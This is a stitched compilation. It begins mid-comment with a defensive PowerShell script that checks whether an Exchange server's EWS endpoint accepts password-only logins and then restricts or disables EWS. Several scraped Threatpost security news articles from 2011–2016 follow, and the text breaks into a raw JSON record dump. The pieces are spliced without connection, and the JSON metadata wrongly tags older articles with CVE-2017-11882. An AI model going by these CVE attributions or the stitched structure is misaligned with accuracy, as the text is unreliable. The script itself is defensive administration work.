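# on an on-premises Exchange server (2010 or later assumed for the EWS
# allow-list settings). Written for Windows PowerShell 5.1.
# 'mail.example.com' is a placeholder hostname, not a real target.

# --- Part 1: external probe ---------------------------------------------------
# Ask the OWA host for /owa/ and /EWS/Exchange.asmx. OWA normally serves a logon
# page (200, or a redirect to it); EWS normally answers 401 with a
# WWW-Authenticate challenge (Negotiate/NTLM, sometimes Basic). That challenge is
# the problem: a password alone satisfies it, whatever 2FA sits in front of OWA.
function Test-EwsExposure {
    param([Parameter(Mandatory)][string]$HostName)

    foreach ($path in '/owa/', '/EWS/Exchange.asmx') {
        $uri = "https://$HostName$path"
        try {
            $resp   = Invoke-WebRequest -Uri $uri -Method Get -UseBasicParsing -ErrorAction Stop
            $status = [int]$resp.StatusCode
            $auth   = $resp.Headers['WWW-Authenticate']
        } catch [System.Net.WebException] {
            # Invoke-WebRequest throws on 4xx/5xx; the response is still attached.
            $r = $_.Exception.Response
            if (-not $r) { throw }          # DNS/TLS/connection failure: surface it
            $status = [int]$r.StatusCode
            $auth   = $r.Headers['WWW-Authenticate']
        }
        [pscustomobject]@{
            Path              = $path
            Status            = $status
            AuthChallenge     = $auth
            PasswordOnlyEntry = ($status -eq 401 -and $auth -match 'NTLM|Negotiate|Basic')
        }
    }
}

# Example run against the placeholder host:
# Test-EwsExposure -HostName 'mail.example.com' | Format-Table -AutoSize

# --- Part 2: Exchange Management Shell ---------------------------------------
# Show that the OWA and EWS virtual directories live on the same Client Access
# servers (and, by default, behind the same HTTPS listener).
function Show-OwaAndEwsEndpoints {
    Get-OwaVirtualDirectory         | Select-Object Server, Name, ExternalUrl
    Get-WebServicesVirtualDirectory | Select-Object Server, Name, ExternalUrl
}

# Mailboxes that can still authenticate over EWS. EwsEnabled is $null when the
# mailbox inherits the organization setting, which means enabled.
function Get-EwsEnabledMailboxes {
    Get-CASMailbox -ResultSize Unlimited |
        Where-Object { $_.EwsEnabled -ne $false } |
        Select-Object Name, EwsEnabled, EwsApplicationAccessPolicy, EwsAllowList
}

# Organization-wide allow list of EWS client user-agent strings (wildcards are
# accepted). Any client whose User-Agent does not match is refused at EWS.
# The defaults below are sample prefixes; take the real values from your EWS logs.
function Set-EwsAllowList {
    param([string[]]$AllowedUserAgents = @('Microsoft Office/*', 'MacOutlook/*'))
    Set-OrganizationConfig -EwsApplicationAccessPolicy EnforceAllowList `
                           -EwsAllowList $AllowedUserAgents
}

# The hard off-switch for accounts that never use a thick client.
function Disable-EwsForMailbox {
    param([Parameter(Mandatory)][string]$Identity)
    Set-CASMailbox -Identity $Identity -EwsEnabled $false
}
```

Two caveats a practitioner should keep in mind. The allow list matches the User-Agent string the client sends, which any tool can forge, so it raises the bar against off-the-shelf tooling but is not a second factor; the durable fixes are disabling EWS for every account that does not need a thick client, or placing EWS itself behind the same MFA gate as OWA. And because the allow list is organization-wide, a legitimate client left off the list stops working at once, so run Get-EwsEnabledMailboxes and review the EWS logs before enforcing it.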
The vulnerability was initially highlighted in [Oracle's Critical Patch Update Advisory for this month](<http://www.oracle.com/technetwork/topics/security/cpujul2012-392727.html>).

In a [post on its TechNet blog](<https://blogs.technet.com/b/msrc/archive/2012/07/24/security-advisory-2737111-released.aspx?Redirected=true>), Dave Forstrom of Microsoft's Trustworthy Computing group said Microsoft isn't aware of any active exploits against the vulnerability, but urged users to apply the workaround until a proper security update is available.

[A separate blog post](<http://blogs.technet.com/b/srd/archive/2012/07/24/more-information-on-security-advisory-2737111.aspx>) by Microsoft's Security Research and Defense team explains that the best way to minimize risk is to disable WebReady Document Viewing on the OWA virtual directory of every Client Access Server (CAS). That feature is where the exposure lies: WebReady Document Viewing renders certain attachments server-side as a web page "instead of relying on local applications to open/view it," according to the post, so a malicious attachment is parsed on the Exchange server itself.

For more on this, including a more in-depth explanation of the Oracle flaw, head to [TechNet](<https://blogs.technet.com/b/msrc/archive/2012/07/24/security-advisory-2737111-released.aspx?Redirected=true>).

_Source: Threatpost, "Microsoft Publishes Workaround for Oracle Outside In Vulnerability," published 2012-07-26: [threatpost.com](<https://threatpost.com/microsoft-publishes-workaround-oracle-outside-vulnerability-072612/76854/>)_

---

Today is Patch Tuesday, the 11-year-old procession of security bulletins from Microsoft streamed out automatically to consumers of
Windows Update, and pulled en masse by enterprise admins worldwide needing to test each for compatibility.

This is how it's been done since shortly after Bill Gates' Trustworthy Computing memo in 2002 set Microsoft on its course of secure software development. But in 2015, as the concept approaches adolescence, are we asking the right questions about the viability of scheduled patch delivery?

Sure, enterprises may be ingrained in this rote consumption of security fixes on the second Tuesday of every month. But Microsoft is in the middle of a personality overhaul under new CEO Satya Nadella with a vigorous focus on the cloud, and the company's [vaunted Trustworthy Computing group has been disbanded as a single entity](<http://threatpost.com/era-ends-with-break-up-of-trustworthy-computing-group-at-microsoft/108404>) and migrated into several business units inside Microsoft. Patch Tuesday may be showing some signs of cracking.

Outside forces aren't helping much. Zero days dominate the headlines, but affect relatively few until attacks find their way into exploit kits, turning specialized hacks into commodity danger. Google's Project Zero is the most recent conspirator undermining the value of regular patching cycles; the research team has put vendors on notice that a [90-day countdown](<http://threatpost.com/round-2-google-deadline-closes-on-pair-of-microsoft-vulnerabilities/110474>) starts the second a vulnerability is reported to Microsoft, or to any other vendor for that matter. Once the 90 days are up, disclosure is full and angst is high.

**Patch Quality in Crosshairs**

Internally, since TWC was integrated into Microsoft's cloud and enterprise group in September, coinciding with more than 2,100 layoffs that included several key security people, eyebrows have also been raised about patch quality and timeliness. Most notably, a critical vulnerability in Schannel, the SSL/TLS implementation in Windows, was patched in November, but within days the patch was pulled back because of [issues with TLS negotiations](<http://threatpost.com/issues-arise-with-ms14-066-schannel-patch/109385>). It was re-issued in short order, but coincidentally or not, the episode did not endear anyone to the reorg going on in Redmond.

Even going into today's Patch Tuesday release, a critical [cross-site scripting vulnerability in Internet Explorer affecting Windows 7 and 8.1](<http://threatpost.com/xss-vulnerability-in-ie-could-lead-to-phishing-attacks/110854>) users, made public last week along with proof-of-concept code, remains unpatched, and Microsoft has been silent on when a fix is coming. That silence could, in part, be due to the fact that the company recently [stopped providing advance notification of patches](<http://threatpost.com/microsoft-limits-advanced-patch-notifications-to-premier-customers/110294>) to anyone but premier support customers. Perhaps security will stop being a marketing differentiator for Microsoft.

"They're not going to get rid of security, but like Apple, put it more behind the scenes," said Marc Maiffret, a longtime Windows bug-hunter and current CTO at BeyondTrust. "It's not going to be the thing they talk about most. It distracts from them being a software and technology company."

Microsoft's QA testing of patches is extensive and reportedly separate from the Microsoft Security Response Center (MSRC) and TWC, which focus on security research, threat modeling and risk management. Updates are tested against a variety of application and operating system environments for compatibility issues and must meet strict deadlines to make it into Windows Update in a timely fashion. Patches are also tested against third-party applications, and Microsoft will insist that patch quality issues have little to do with the TWC changes and more to do with advanced and changing threats.

"Microsoft carefully reviews and tests each security update to ensure its quality and that it has been thoroughly evaluated for application compatibility. There are many factors that can impact the length of testing," said Chris Betz of the MSRC in a statement provided to Threatpost. "Once the update is built, it must be tested with the different operating systems and applications it affects, then localized for the different markets and languages around the world. In some instances, multiple vendors are affected by the same or similar issues, which requires a coordinated release."

Microsoft's focus on delivering a consistent schedule of patches helps users inside the enterprise and smaller organizations line up their deck chairs, do compatibility testing and control patch rollouts. These processes are finely tuned compared to a decade ago, and most organizations would not trade Patch Tuesday for, say, automatic silent patching à la Google's updates to Chrome, experts said.

"The bigger factor that surrounds things like Patch Tuesday is that threats have changed," Maiffret said. "Organizations like governments, or anyone who is a high-value target, have a good chance of getting hit with a zero day, which Patch Tuesday has no bearing on, at least up front. That's a big part of it: security moving away from the value of one individual vulnerability."

**Automatic Patching Has Its Place**

Microsoft, for its part, has not been stagnant with patching. New services such as [myBulletins](<http://threatpost.com/microsoft-mybulletins-service-customizes-patch-details/106339>) and a revamped Exploitability Index help customers make deployment decisions, while partner programs such as the Microsoft Active Protections Program give participating enterprises and vendors a heads-up on vulnerability details so they can coordinate protections and patch delivery for interdependent products.

"Each customer is unique with varying needs based on their technology environments. With the evolution of cloud computing, more and more customers are taking advantage of the real time updates we provide," said Betz. "Customers are also increasingly taking advantage of Microsoft Update to automatically provide updates."

Attackers, however, have the luxury of focusing on one bug, while defenders have to weigh the biggest risks to their respective environments and hope they get the assessments and prioritization right. And this goes well beyond Microsoft to third-party applications such as Flash, Java and others that run everywhere and have lately been providing attackers with far more tempting targets. Yet with the world primarily still running on Windows, especially in smaller organizations, patch quality still gives people pause about moving to an automated process.

"I think people would like to be in automatic mode. There's a huge value to set-it-and-forget-it, but there's still a risk involved and it's difficult for people to consume that risk not knowing what could happen," said Andrew Storms, vice president of security services at New Context, and former security executive at CloudPassage and nCircle. "Large enterprises are always slower moving to the adoption of new concepts and risk, especially with IT. The argument for the other side is what if I could cut a third of my patching costs if I don't have to patch all the time; if I were a CIO, I would be drooling."

That, of course, depends on patches that are good to go out of the box, so to speak.

"Any business at the scale of Google or Microsoft has so many complexities that there are going to be unforeseen interactions," said Tripwire security researcher Craig Young. "That's why enterprises test patches in a controlled environment to make sure they don't breach critical business applications before rolling them out to systems. That works. The Chrome model is probably not appropriate if you're a hospital where all your terminals need a web app interface with insurance providers, and if Microsoft updates IE and the web app no longer renders properly, how would you address that situation?"

**Environment to Dictate Patching Styles**

Katie Moussouris, a former lead security strategist at Microsoft and current chief policy officer at HackerOne, was deeply involved in developing Microsoft's coordinated disclosure program and in building strong relationships with vulnerability researchers and brokers. She says vendors need to sharpen patch development so that quality and speed go hand in hand. This takes on more relevance with the so-called Internet of Things, where embedded computers often lack simple patching mechanisms yet play critical roles in manufacturing, health care and personal environments.

"Patching style is something that definitely has to evolve as what makes up the bulk of internet traffic starts changing," Moussouris said. "Mobile devices are difficult to patch, and are not patched on anyone's schedule. Many are not designed to be patched either; they're designed to be upgraded or thrown away in two years."

Microsoft, meanwhile, has taken steps to [make exploitation more difficult for attackers](<http://threatpost.com/ie-memory-attacks-net-zdi-125000-microsoft-bounty/110876>). The introduction of memory corruption mitigations such as ASLR and DEP into Windows and Internet Explorer has made buffer overflow vulnerabilities far harder to exploit reliably than they were a decade ago. Free tools such as the [Enhanced Mitigation Experience Toolkit (EMET)](<http://threatpost.com/microsoft-emet-bypasses-realm-of-white-hats-for-now/104619>) are often a stopgap for zero-day vulnerabilities until Microsoft can release a scheduled or out-of-band security bulletin.

"Microsoft has focused on a higher level of mitigations, knowing how high to raise the bar to make exploitation really hard," Maiffret said. "I hope they keep their eye on mitigations, not just EMET but also the underlying operating system."

For the time being, Microsoft won't retire Patch Tuesday, and its high-paying enterprise customers likely won't let it. In the end, Patch Tuesday is still relevant on many fronts, and its processes are still superior to many third-party patching processes.

"Stepping back, you have to ask: 'What's the relevance of Microsoft vulnerabilities in attacks and exploits?'" Maiffret said. "Microsoft software is still relevant and part of targeted attacks; you still see IE targeted attacks happening, but at the same time, you're seeing an increase of third-party apps in targeted attacks. That's the biggest shift. Microsoft is slightly putting security in the back seat, not doing less internally, but in visibility. That mirrors what's happening from the attackers' perspective; it's just as important to find a Flash or Java vulnerability versus a Microsoft vulnerability."

_Source: Threatpost, "Creaking Patch Tuesday's Viability Rests with Quality, Speed," published 2015-02-10: [threatpost.com](<https://threatpost.com/creaking-patch-tuesdays-viability-rests-with-quality-speed/110941/>)_

---

**UPDATE –** In an unexpected turn, Microsoft's monthly Patch Tuesday security updates released today did not include patches for the Internet Explorer vulnerabilities used during the Pwn2Own contest one month ago.

The popular hacker contest attracted researchers from all over who were targeting all the major browsers, as well as third-party software such as [Flash and Java](<https://threatpost.com/firefox-java-flash-all-taken-down-pwn2own-030713/>). Companies such as VUPEN and MWR Labs were able to beat locked-down versions of [IE 10 running on Windows 8](<https://threatpost.com/pwn2own-browser-exploits-getting-harder-more-expensive-find-030613/>) and Mozilla's Firefox browser, as well as Chrome running on Windows. Unlike Mozilla and Google, both of which [patched the flaws exploited during the contest within 24 hours](<https://threatpost.com/mozilla-and-google-patch-browser-flaws-used-pwn2own-030813/>), Microsoft had yet to update its browser.
The surprise was compounded by last Thursday's advance notification, which indicated that a cumulative IE update was coming today.

"This puts them quite a bit behind other browsers that already patched their Pwn2Own bugs," said Andrew Storms, director of security operations at nCircle.

A Microsoft representative, along with Qualys CTO Wolfgang Kandek, said the delay is likely due to the regression testing and QA work necessary for patches.

"Microsoft works with the security community to protect our customers against all threats and we are investigating possible issues identified by researchers during the Pwn2Own competition. We are not aware of any attacks and the issues should not affect our customers, as Pwn2Own organizers do not publicly disclose the competition's findings," said Dustin Childs, group manager, Microsoft Trustworthy Computing.

Today's IE rollup addresses a pair of critical remote code execution flaws in versions 6 through 10 of the browser. Both are use-after-free vulnerabilities in the way IE accesses objects in memory that have been deleted. "These vulnerabilities may corrupt memory in such a way that an attacker could execute arbitrary code in the context of a user," Microsoft said in its bulletin [MS13-028](<https://technet.microsoft.com/en-us/security/bulletin/ms13-028>). Users would have to be lured to a website hosting an exploit via a phishing or spam email, Microsoft said.

"MS13-028 has a score of '2' in the Exploitability Index, indicating that the construction of an exploit for the vulnerability is not entirely straightforward and not expected within the next 30 days," Kandek said.

The IE update is one of nine bulletins released today addressing 14 vulnerabilities, a relatively light month compared to the 57 vulnerabilities patched in February. One other bulletin was rated critical, covering another remote code execution vulnerability, this one in the Microsoft Remote Desktop Client. [MS13-029](<https://technet.microsoft.com/en-us/security/bulletin/ms13-029>) includes patches for the Remote Desktop Connection 6.1 and 7.0 clients on Windows XP, Vista and Windows 7, as well as Windows Server 2003, 2008 and 2008 R2.

"A remote-code execution vulnerability exists when the Remote Desktop ActiveX control, mstscax.dll, attempts to access an object in memory that has been deleted. An attacker could exploit the vulnerability by convincing the user to visit a specially crafted webpage," Microsoft said in its alert. "An attacker who successfully exploited this vulnerability could gain the same user rights as the logged-on user."

Ross Barrett, senior manager of security engineering at Rapid7, said that while versions 6.1 and 7 are vulnerable, version 8 is unaffected, though it is not yet the default.

"This issue could be triggered through an RDP link in a browser or other content. A workaround would be to set the 'kill-bit' for these ActiveX controls, but the update actually fixes the issue, rather than disabling the RDP control," Barrett said.

Storms said there are enough mitigating circumstances to make it less problematic for most businesses.

"The bug does not affect the latest RDP client, version 8, which dramatically reduces the affected number of machines," Storms said. "Microsoft has released mitigation steps to disable the affected ActiveX control. Also, if your users browse with default IE settings, they will be presented with the 'gold bar' warning providing them with an opportunity to opt out of an attack."

The remaining seven bulletins are rated important by Microsoft. Among them, a denial-of-service bug in Active Directory has caught experts' attention. [MS13-032](<https://technet.microsoft.com/en-us/security/bulletin/ms13-032>) could be triggered if an attacker sends a specially crafted query to the LDAP service, causing it to consume memory until it stops responding. The vulnerability affects Active Directory, Active Directory Application Mode (ADAM), Active Directory Lightweight Directory Service (AD LDS), and Active Directory Services on Microsoft Windows servers.

"It should be high on the list for enterprise installations," Kandek said. "An attacker can shut down the domain controllers for an organization using only a single workstation."

Among the remaining bulletins are privilege escalation vulnerabilities and an information disclosure bug:

 * [MS13-030](<https://technet.microsoft.com/en-us/security/bulletin/ms13-030>) is an information-disclosure vulnerability in SharePoint, exploitable if an attacker knew the location of a SharePoint list and had access with legitimate credentials.
 * [MS13-031](<https://technet.microsoft.com/en-us/security/bulletin/ms13-031>) is a privilege escalation flaw in the Windows kernel. Exploits would require valid credentials in order to carry out an attack.
 * [MS13-033](<https://technet.microsoft.com/en-us/security/bulletin/ms13-033>) affects the Windows Client/Server Runtime Subsystem in the way it handles objects in memory. Attackers would need valid credentials and local access to pull off an exploit.
 * [MS13-034](<http://technet.microsoft.com/en-us/security/bulletin/ms13-034>) is another privilege escalation bug, this time in Windows Defender, the Microsoft antimalware client. Successful exploits could enable an attacker to run code on the affected machine, view, change or delete data, or create new accounts.
 * [MS13-035](<https://technet.microsoft.com/en-us/security/bulletin/ms13-035>) repairs a vulnerability in the Microsoft HTML Sanitization Component found in Microsoft Office. An attacker would have to send a malicious Office document to pull off an attack.
 * [MS13-036](<https://technet.microsoft.com/en-us/security/bulletin/ms13-036>) patches three vulnerabilities in kernel-mode drivers that would elevate privileges for an attacker who has valid credentials and local access to exploit the flaws.

_This article was updated to include a comment from Microsoft._

_Source: Threatpost, "Pwn2Own IE Vulnerabilities Missing from Microsoft Patch Tuesday Updates," published 2013-04-09: [threatpost.com](<https://threatpost.com/pwn2own-ie-vulnerabilities-missing-microsoft-patch-tuesday-updates-040913/77712/>)_

---

Everyone knows that the first year of marriage can be a tough one; around three percent of them end in the first 12 months. Looks like the same can be true of malware marriages, with the union of the Zeus and SpyEye Trojans now in question.

Just one year after news broke that the Zeus and SpyEye Trojan families had merged, virus experts say there's reason to question whether the union is still intact.

Researchers at Microsoft and Kaspersky Lab told Threatpost that, although there's clearly evidence that code was shared between the two malware families, the rumored merger of Zeus and SpyEye never took place.
In fact, the two botnets continue as separate entities, with some researchers wondering whether they are even controlled by the same individuals or criminal groups.

Zeus and SpyEye were the two main families of botnet software, with SpyEye [playing the role of upstart competitor to the more established Zeus](<https://threatpost.com/tracker-spyeye-not-yet-zeus-stature-110910/>). For a while, the competition for online hosts was intense, with [both malware families adding features to remove the other from systems they infected](<https://threatpost.com/malware-trojan-wars-spyeye-vs-zeus-040110/>).

That rivalry seemed to end in October 2010, when researchers observed what appeared to be a merger of the two crime kits, around the same time that the author of the Zeus botnet decided to get out of the business and hand over his code. Those reports were backed by online forum posts by the SpyEye author claiming that the Zeus source code had been turned over to him and that the two Trojans [would soon be "merged into one powerful Trojan](<http://krebsonsecurity.com/2010/10/spyeye-v-zeus-rivalry-ends-in-quiet-merger/>)."

By the end of 2010, an update to the SpyEye crimeware toolkit (version 1.3.x) included a feature, formerly unique to the Zeus kit, that targeted an anti-Trojan agent developed by the firm Trusteer. The new version of SpyEye also dropped the feature that removed Zeus if it was found running on the infected machine, Microsoft said.

Despite some early reports that a merged SpyEye/Zeus Trojan was circulating online, the promised merger never happened beyond some basic cutting and pasting of code. In fact, subsequent reports suggested that the two malware families were [continuing down separate tracks, with Zeus adding new features not seen in the other](<https://threatpost.com/zeus-malware-not-dead-yet-new-features-being-added-030411/>).

Now Microsoft says that reports of the merger may have been overblown. In a post Tuesday on the company's Threat Research and Response Blog, researchers said that they considered reports of the union to be "speculative" and saw little evidence that Zeus and SpyEye were sharing code.

The company declined to discuss the specifics of its research, but stood by the statement in its blog post.

Dmitry Tarakanov, a researcher at Kaspersky Lab who has studied the two families, said that there was a code transfer from Zeus to SpyEye in the immediate aftermath of the source code being handed to the SpyEye author. For example, the SpyEye author grabbed a Zeus feature that allowed the malware to force Web browsers on infected systems to load malicious HTML served by the botnet, even in cases where the host had a recent version of the page in question (say, an electronic banking site) stored locally in its browser cache. "SpyEye could not intercept the cached html-code," Tarakanov wrote in an e-mail. "So the author of SpyEye had seen that part of the code where Zeus replaces the cache as well, and added that part of the code into his own source code of SpyEye."

But there's little evidence of further consolidation of the two code bases after that, he said. "We can make a conclusion that the author of SpyEye did not even try to concoct one bot squeezing all the best from the two source codes," he wrote.

Tarakanov said he believes the original author of Zeus was interested in washing his hands of the malware industry, especially with increased attention to the Zeus malware from law enforcement. In September 2010, more than 60 individuals were charged in the U.S. and U.K. for crimes linked to the Zeus botnet. That may have chased the bot's original author into hiding.

Human nature may explain the SpyEye author's failure to carry out the grand union of the two botnets that was originally promised. "People tend not to change work," Tarakanov wrote. In other words: 'if it ain't broke, don't fix it,' as the saying goes.

However, it's harder to explain the subsequent modifications to the Zeus code, which Tarakanov said are "too serious and notable" to be the work of amateurs. While it's possible that the SpyEye author would choose to keep the malware families separate, it's harder to understand why new features added to Zeus weren't also added to SpyEye. "A programmer really does not like to code one thing twice. So, it's hard to believe that the author of SpyEye somehow developed new features (but different) for SpyEye and for Zeus," he wrote.

One possibility is that both tools are being offered to cyber criminals simultaneously, rather than forcing one set of customers to abandon their platform of choice or asking everyone to switch to a new, merged platform. Aviv Raff, the CTO of Seculert, said in June that his researchers had found [evidence of back-end servers being used to host both the Zeus and SpyEye crimeware packs](<https://threatpost.com/malware-exploit-kit-writers-merging-their-talents-062411/>). Attackers interested in using one or the other can choose which tool they'd like to use at any given time, said Raff, who expects greater convergence of crime kits like SpyEye and Zeus with Web exploit kits in the future.

It's also possible that the main development of Zeus has been passed to a third party now that the malware source code is available online. "The situation is too muddy and there are too many conflicting arguments," Tarakanov said.

_Source: Threatpost, "SpyEye and Zeus Malware: Married Or Living Separately?," published 2011-10-14: [threatpost.com](<https://threatpost.com/spyeye-and-zeus-malware-married-or-living-separately-101411/75755/>)_

---

Microsoft on Tuesday released (again) the five security bulletins for its September Patch Tuesday. None of the fixes being released today is rated critical; all five are rated important. Three of the bulletins fix flaws that could result in code execution.

Microsoft also updated the security advisory it originally released a couple of weeks ago regarding the DigiNotar compromise, revoking trust for an additional six DigiNotar certificates, namely those cross-signed by Entrust and GTE CyberTrust. Here is the full list of certificates placed by Microsoft into the Untrusted Certificates store; entries marked with an asterisk are the six added in this update:

 * DigiNotar Root CA
 * DigiNotar Root CA G2
 * DigiNotar PKIoverheid CA Overheid
 * DigiNotar PKIoverheid CA Organisatie – G2
 * DigiNotar PKIoverheid CA Overheid en Bedrijven
 * DigiNotar Root CA Issued by Entrust (2 certificates)*
 * DigiNotar Services 1024 CA Issued by Entrust*
 * DigiNotar Cyber CA Issued by GTE CyberTrust (3 certificates)*

The five bulletins released by Microsoft on Tuesday include fixes for vulnerabilities in Windows, Office, Excel, SharePoint and WINS. In an odd mistake, Microsoft on Friday accidentally made the link to the September bulletins live four days early.
The page was only available for a short time before Microsoft removed it, but it was long enough for several sites to post the text of the advisories.\n", "cvss3": {}, "published": "2011-09-13T18:08:30", "type": "threatpost", "title": "Microsoft Releases Five Bulletins For September Patch Tuesday", "bulletinFamily": "info", "cvss2": {}, "cvelist": ["CVE-2017-11882"], "modified": "2013-04-17T16:33:47", "id": "THREATPOST:CC82779FBE47FD3E64708FE6233C3DAD", "href": "https://threatpost.com/microsoft-releases-five-bulletins-september-patch-tuesday-091311/75649/", "cvss": {"score": 9.3, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}, {"lastseen": "2018-10-06T22:59:51", "description": "Microsoft is warning users about targeted attacks against a new vulnerability in several versions of Windows and Office that could allow an attacker to take over a user\u2019s machine. The bug, which is not yet patched, is being used as part of targeted attacks with malicious email attachments, mainly in the Middle East and Asia.\n\nIn the absence of a patch, Microsoft has released a FixIt tool for the vulnerability, which prevents exploits against the vulnerability from working. The bug affects Windows Vista, Windows Server 2008 and Microsoft Office 2003 through 2010.\n\n\u201cThe exploit requires user interaction as the attack is disguised as an email requesting potential targets to open a specially crafted Word attachment. If the attachment is opened or previewed, it attempts to exploit the vulnerability using a malformed graphics image embedded in the document. 
An attacker who successfully exploited the vulnerability could gain the same user rights as the logged on user,\u201d the Microsoft [advisory](<http://blogs.technet.com/b/msrc/archive/2013/11/05/microsoft-releases-security-advisory-2896666-v2.aspx>) says.\n\nThe vulnerability doesn\u2019t affect the current versions of Windows, the company said, and users who are running potentially vulnerable products can take a couple of actions in order to protect themselves. Installing the [FixIt tool](<http://technet.microsoft.com/en-us/security/advisory/2896666>) will help prevent exploitation, as will deploying the Enhanced Mitigation Experience Toolkit (EMET), which helps mitigate exploits against certain classes of bugs.\n\n\u201cThe vulnerability is a remote code execution vulnerability that exists in the way affected components handle specially crafted TIFF images. An attacker could exploit this vulnerability by convincing a user to preview or open a specially crafted email message, open a specially crafted file, or browse specially crafted web content. An attacker who successfully exploited the vulnerability could gain the same user rights as the current user. 
Users whose accounts are configured to have fewer user rights on the system could be less impacted than users who operate with administrative user rights,\u201d Microsoft officials said.\n", "cvss3": {}, "published": "2013-11-05T14:07:32", "type": "threatpost", "title": "Microsoft Warns of Targeted Attacks on Windows 0-Day", "bulletinFamily": "info", "cvss2": {}, "cvelist": ["CVE-2017-11882"], "modified": "2013-11-05T19:07:32", "id": "THREATPOST:DF45F7CBB6E670440E0A14E517EA753D", "href": "https://threatpost.com/microsoft-warns-of-targeted-attacks-on-windows-0-day/102821/", "cvss": {"score": 9.3, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}, {"lastseen": "2018-10-06T22:54:29", "description": "Microsoft last week extended the end-of-life expiration date to July 2018 on its exploit mitigation add-on, the Enhanced Mitigation Experience Toolkit (EMET). But for some time, the once-useful tool has been well on its way out to pasture.\n\nWhile EMET was never meant to be anything more than stopgap protection against exploits, attackers and white-hat researchers accelerated its demise with a number of publicized [bypass attacks](<https://threatpost.com/microsoft-emet-bypasses-realm-of-white-hats-for-now/104619/>). That situation, plus Microsoft\u2019s urgency to have users migrate to Windows 10 and the array of new memory mitigations included in the latest OS has brought the curtain down on EMET.\n\n\u201cIt was a stopgap. It was never supposed to be something [Microsoft] wanted people to use longterm,\u201d said Cody Pierce, director of vulnerability research at Endgame. 
\u201cThey want people to upgrade Windows 10; for the good of their customers, they want to transition them to Windows 10 where there are some protections baked into the operating system.\u201d\n\nForemost is Control Flow Guard, a technology built to counter memory-corruption vulnerabilities, which has been available since Visual Studio 2015 and is also built into Windows 10 and Windows 8.1. [Control Flow Guard](<https://threatpost.com/bypass-developed-for-microsoft-memory-protection-control-flow-guard/114768/>) is thought to be a primary impediment to [use-after-free attacks](<https://threatpost.com/bypass-demonstrated-for-microsoft-use-after-free-mitigation-in-ie/110570/>), which became a favorite exploit once ASLR and DEP put a damper on buffer overflow attacks.\n\n\u201cThere are a lot more compile time mitigations [in Windows 10] like Control Flow Guard, and a new Return Flow Guard feature,\u201d said Darren Kemp, security researcher with Duo Security. Kemp also pointed out that since Windows 10\u2019s mitigations are integrated into the operating system, unlike EMET, there are fewer instances where users will notice a performance hit, which was increasingly common with EMET. Also, EMET required close care when configuring it to work, otherwise it could break certain application processes.\n\n\u201cSince it\u2019s not integrated, you don\u2019t get the same type of tight coupling,\u201d Kemp said. \u201cWith a lot of stuff in EMET, you have to test the software you\u2019re applying it to, to make sure the mitigations don\u2019t cause problems. It hooks into functions and injects features. If software does non-standard things, it can cause problems with those apps.\u201d\n\nMicrosoft, meanwhile, has not had EMET on a consistent upgrade path since version 5.0 dropped in 2014. This was an abrupt change from the early days when EMET was introduced and exploits were unleashed within days of Patch Tuesday releases. 
In announcing the deadline extension to July 31, 2018, Microsoft\u2019s Jeffrey Sutherland acknowledged EMET\u2019s limitations against modern advanced attacks, its performance and reliability shortcomings, and urged users toward Windows 10, which makes the most of hardware virtualization to sandbox applications and links before they can harm the operating system.\n\n\u201cWith the types of threats enterprises face today, we are constantly reminded of this simple truth: modern defense against software vulnerabilities requires a modern platform,\u201d Sutherland said.\n\nThe true value of any mitigation continues to be how well it raises the cost of attacks. Pierce illustrated how advanced attackers have blown well past EMET\u2019s [menu of mitigations](<https://technet.microsoft.com/en-us/security/jj653751>) with advanced logic that automates many facets of an attack that its defenses cannot keep up with.\n\n\u201cIf you\u2019re an exploit kit writer and you acquire a zero day or develop an exploit, you have to get the most bang for your buck; and part of that is supporting a wide range of targets. If you\u2019ve got a Flash exploit, you want it to work on Firefox, Windows, Linux and more and you have to come up with ways to make it easier on you,\u201d Pierce said. \u201cA lot of the ways they\u2019ve figured out to do that bypasses a lot of these late-hook defenses like EMET. They\u2019re getting more value out of it. The types of exploit mitigations EMET provides were limited in utility due to the nature of exploitation. If you look at an exploit kit from 2010, it looks wildly different than it does now.\u201d\n\nDuo\u2019s Kemp, meanwhile, says Windows 10 is one of the hardest targets to breach today.\n\n\u201cThat\u2019s the nature of this stuff: raising the bar. 
If you\u2019re an attacker, do you want to invest a lot of time and energy to figure out a way around this, or are you going to go after something else?\u201d Kemp said.\n", "cvss3": {}, "published": "2016-11-07T13:50:00", "type": "threatpost", "title": "Microsoft Tears off the Band-Aid with EMET", "bulletinFamily": "info", "cvss2": {}, "cvelist": ["CVE-2017-11882"], "modified": "2016-11-15T14:12:29", "id": "THREATPOST:714DD68C5B32F675D9C75A67D7288B65", "href": "https://threatpost.com/microsoft-tears-off-the-band-aid-with-emet/121824/", "cvss": {"score": 9.3, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}, {"lastseen": "2018-10-06T22:58:06", "description": "Microsoft had always rejected the possibility of a [full-scale bug bounty](<http://threatpost.com/microsofts-bug-bounty-program-and-the-law-of-unintended-consequences/101038>), relying instead on solid relationships it spent the better part of a decade fostering with researchers worldwide who submit vulnerabilities to the Microsoft Security Research Center (MSRC).\n\nYet in the past couple of years, the company has bent a bit in the other direction, instituting reward programs for researchers who develop new bypasses for exploit mitigations, or defensive techniques that can be folded into Microsoft products.\n\nThe company has already paid out several hundred thousand dollars to researchers who have successfully [beaten exploit mitigations in Windows](<https://threatpost.com/microsoft-launches-100000-bug-bounty-program/101015>), including ASLR, DEP, SEHOP and more, as well as rewarding one researcher $200,000 for a new technique to [defend against return-oriented programming (ROP) attacks](<https://threatpost.com/vasillis-pappas-wins-200000-microsoft-blue-hat-prize-072712>).\n\nIndividual vulnerability payouts have been off the board for the most part (Microsoft did institute a [temporary bounty for Internet Explorer 
